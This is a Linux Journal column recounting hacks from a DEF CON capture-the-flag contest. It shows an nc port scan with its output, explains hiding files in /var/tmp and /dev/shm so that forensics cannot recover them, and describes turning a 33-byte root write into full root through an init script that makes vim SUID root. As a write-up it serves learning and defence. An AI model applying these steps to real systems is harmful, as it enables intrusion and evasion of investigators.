Hack and / - Some Hacks from DEF CON
Another incredibly useful function of nc is as a port scanner when something more sophisticated isn't around. Just use the -z option to have nc test only whether a port is open instead of connecting to it, add -v for verbose output, and provide a port range as arguments. So to scan a host for open ports between 20 and 25 (good for testing for open FTP, telnet, SSH and SMTP services), you would type:
$ nc -zv host.example.org 20-25 nc: connect to host.example.org port 20 (tcp) failed: ↪Connection refused Connection to host.example.org 21 port [tcp/ftp] succeeded! Connection to host.example.org 22 port [tcp/ssh] succeeded! nc: connect to host.example.org port 23 (tcp) failed: ↪Connection refused nc: connect to host.example.org port 24 (tcp) failed: ↪Connection refused Connection to host.example.org 25 port [tcp/smtp] succeeded!
Another interesting point at the competition involved a system in which you could log in, however, a number of directories, including the home directory, were mounted over NFS read-only. This presented an interesting set of limitations. For instance, because the machine was being attacked by multiple teams who each could log in as the same user, everyone was kicking each other off the machine. This meant every time you wanted to log in, you had to type in the password manually, yet because the home directory was read-only, you couldn't automate the process with SSH keys. It also meant you needed to be creative with where you stored your scripts, as you couldn't write to the main directory to which your user normally had access.
For the defender, you can see why mounting secure directories as read-only over NFS presents a problem for attackers—attackers can't write to the directory as users, and also even if they become root, they also might have to exploit the NFS server to remount the filesystem in read-write mode. As an attacker, that just meant you needed to be a bit more creative with where you store your files.
Most command-line users are aware of the existence of the /tmp directory on a Linux system. This is a directory to which all users can write, and special permissions are set on the directory so that although anyone can write to files there, once a file is created, other users can't access it. When hacking this particular restricted system, you could very well store your scripts in /tmp, but that's the first place other teams would notice your files and would likely delete them (bad) or modify them to do something you didn't expect (worse). Luckily, there are at least two other less-well-known directories on a Linux system that are writable by everyone: /var/tmp and /dev/shm.
The /var/tmp directory serves much the same function as /tmp does in that all users and programs can write to it; however, unlike the /tmp directory, many users are unaware that it exists or forget to look there. Also unlike the /tmp directory, which gets erased when the system reboots, any files you put in /var/tmp persist between reboots.
The /dev/shm directory is also a hacker favorite and for good reason—it's even less well-known among administrators that it's world-writable. An even better reason than that for an attacker to use this directory is that its contents actually are stored only in RAM, not on a disk, so once the system reboots, the files are gone and not even forensics techniques can recover them.
At a particular point in the competition, some smart hackers on the neg9 team discovered a fault in a custom service running as root on one of the competition systems. They were able to turn this flaw into a root exploit that allowed them to write 33 bytes as root anywhere on the filesystem they wanted. The tricky part was that if they chose an existing file, it would be truncated with those 33 bytes.
This presents an interesting problem. If your only root access was the ability to write 33 bytes to a file, how would you convert that into full root access? You might, for instance, write a new file into /etc/cron.d/ that executes an exploit script every minute. What would you do though if that doesn't work? When you put yourself in an offensive mindset in a restricted environment like that, you end up discovering creative ways to approach a system.
There were a few ways you could exploit this option to get full root access. You could, for instance, look in /etc/inittab to see what getty process was set to auto-respawn and then replace the existing getty (for instance, /sbin/agetty) with your custom 33-byte shell code. Then, when getty respawns (which you potentially could force), it would respawn as root, and you'd have your custom code running with root permissions.
The way the team exploited the flaw was to write a new short init script that made vim SUID root. Then, they wrote to a file in /proc that forced the system to reboot, so that upon the reboot, their init script would run. With vim set to SUID root, they could edit root-owned files and do things like change root's password and enable root logins with SSH and finally undo the SUID permissions on vim. From a defender's point of view, this kind of attack is quite tricky to protect against and essentially comes down to basic security practices, such as keeping packages up to date and putting services in sandboxes when possible.
All in all, I have to say, I rather enjoyed this different perspective on security. Whether you are a sysadmin who stays on the defensive side or a hacker who thinks in offensive terms, I think both sides can benefit from putting on the other's hat every now and then.
Kyle Rankin is a Systems Architect in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users' Group.
Kyle Rankin is a VP of engineering operations at Final, Inc., the author of a number of books including DevOps Troubleshooting and The Official Ubuntu Server Book, and is a columnist for Linux Journal. Follow him @kylerankin.
Practical Task Scheduling Deployment
July 20, 2016 12:00 pm CDT
One of the best things about the UNIX environment (aside from being stable and efficient) is the vast array of software tools available to help you do your job. Traditionally, a UNIX tool does only one thing, but does that one thing very well. For example, grep is very easy to use and can search vast amounts of data quickly. The find tool can find a particular file or files based on all kinds of criteria. It's pretty easy to string these tools together to build even more powerful tools, such as a tool that finds all of the .log files in the /home directory and searches each one for a particular entry. This erector-set mentality allows UNIX system administrators to seem to always have the right tool for the job.
Cron traditionally has been considered another such a tool for job scheduling, but is it enough? This webinar considers that very question. The first part builds on a previous Geek Guide, Beyond Cron, and briefly describes how to know when it might be time to consider upgrading your job scheduling infrastructure. The second part presents an actual planning and implementation framework.
Join Linux Journal's Mike Diehl and Pat Cameron of Help Systems.
Free to Linux Journal readers.Register Now!
- Google's SwiftShader Released
- SUSE LLC's SUSE Manager
- My +1 Sword of Productivity
- Murat Yener and Onur Dundar's Expert Android Studio (Wrox)
- Managing Linux Using Puppet
- Non-Linux FOSS: Caffeine!
- Interview with Patrick Volkerding
- SuperTuxKart 0.9.2 Released
- Parsing an RSS News Feed with a Bash Script
- Doing for User Space What We Did for Kernel Space